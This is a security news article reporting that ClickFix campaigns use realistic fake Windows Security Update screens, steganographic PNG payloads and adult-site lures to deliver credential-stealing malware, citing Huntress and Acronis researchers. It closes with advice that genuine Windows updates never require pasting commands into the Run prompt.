ClickFix attack employs fake Windows security udpates.
SOPA Images/LightRocket via Getty Images
Updated November 26 with another threat intelligence report, this time from the Acronis Threat Research Unit, also warning of the use of fake Windows security updates to exploit ClickFix attacks, alongside the Huntress report as detailed previously.
It’s hard being a Windows user sometimes. What with the constant flow of security alerts concerning everything from hackers using ancient protocols and brand new vulnerabilities in attacks. The good news is that Microsoft issues security updates for all users, even those of the now unsupported Windows 10 operating system, if you know how to sign up for them. The bad news is that security updates can cause problems as well as solve them. The even worse news is that hackers have been employing fake Windows security updates as part of a ClickFix cyberattack campaign. Here’s what you need to know.
Experts Sound Alert Over Fake Windows Security Updates
Security experts at Huntress have confirmed that hackers employing the ClickFix malware have been using fake Windows security updates in their attacks.
ClickFix is a type of social engineering technique that tricks users into running malicious commands on their own machines, typically using fake fixes or I-am-not-a-robot prompts. These types of attacks have surged over the past year, with both government-sponsored spies and cybercriminal gangs deploying this technique to deliver malware. The irony being that Microsoft itself has already warned that ClickFix is the most often used method of gaining initial access, “accounting for 47 percent of attacks” observed in Microsoft Defender notifications.
The November 24 report has revealed a new wave of ClickFix attacks, this time using what can only be described as extremely realistic and believable Windows Security Update screens to deploy credential-stealing malware. “A notable discovery during analysis was the campaign’s use of steganography to conceal the final malware stages within an image,” Huntress security analysts Ben Folland and Anna Pham, said. “Rather than simply appending malicious data to a file, the malicious code is encoded directly within the pixel data of PNG images, relying on specific colour channels to reconstruct and decrypt the payload in memory.”
Acronis Threat Research Unit Adds To Windows Security Update ClickFix Concerns
Security researchers based at the Acronis Threat Research Unit have also confirmed what they are calling a “novel JackFix attack” that combines a realistic “full-screen Windows Update of Critical Windows Security Updates,” with a number of screen hijacking techniques. The psychological tricks employed by the attackers are in plain view, with the use of fake porn sites to spring the ClickFix Windows Update trap. “The adult theme, and possible connection to shady websites,”Eliad Kimhy from the Acronis TRU said, “adds to the victim’s psychological pressure, making victims more likely to comply with sudden security update installation instructions.”
The campaign, Kimhy warned, obfuscates the commands used to facilitate the attack as well as the payload itself and, by so doing, it circumvents current ClickFix prevention and detection methods, making it all the more dangerous.
Windows User Recommendations To Mitigate The Latest ClickFix Attacks
All Windows users are advised to be on the alert for the latest ClickFix attacks. Mitigation is actually rather simple, and as with all the previous campaigns, it relies on understanding that a genuine Windows security update, just like the fake CAPTCHA screens employed before, will never, ever, require the user to cut and paste commands into the Windows run prompt from a web page. It just doesn’t happen. Stay safe out there, and heed this advice.
